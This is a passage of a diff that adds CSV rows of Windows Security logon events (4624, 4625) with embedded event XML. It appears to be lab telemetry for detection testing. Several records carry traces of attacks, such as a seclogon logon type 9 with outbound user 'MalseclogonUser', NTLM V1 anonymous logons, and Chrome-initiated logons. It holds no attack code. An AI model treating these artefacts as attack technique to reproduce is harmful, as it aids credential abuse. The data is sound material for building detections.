+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:34.954809Z"">
+    </TimeCreated>
+    <EventRecordID>768628</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x32a0d3</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">6747BCF0-DBAA-F21C-878B-EB339B03FA80</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50441</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:32.206739Z"">
+    </TimeCreated>
+    <EventRecordID>768627</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x329baa</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50443</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:30:32.190369Z"">
+    </TimeCreated>
+    <EventRecordID>768622</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x320935</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50438</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.517594Z"">
+    </TimeCreated>
+    <EventRecordID>768621</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff89</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.507713Z"">
+    </TimeCreated>
+    <EventRecordID>768620</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff6e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:32.174941Z"">
+    </TimeCreated>
+    <EventRecordID>768619</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31fb1a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50437</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:28:32.159991Z"">
+    </TimeCreated>
+    <EventRecordID>768618</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31daf6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50436</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714758Z"">
+    </TimeCreated>
+    <EventRecordID>137225</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd964</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd8f6</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714613Z"">
+    </TimeCreated>
+    <EventRecordID>137224</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd8f6</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd964</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:25.377120Z"">
+    </TimeCreated>
+    <EventRecordID>137223</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""712"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x25c</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4625</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8010000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:23.627952Z"">
+    </TimeCreated>
+    <EventRecordID>137222</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""Status"">0xc000006d</Data>
+    <Data Name=""FailureReason"">%%2313</Data>
+    <Data Name=""SubStatus"">0xc000006a</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
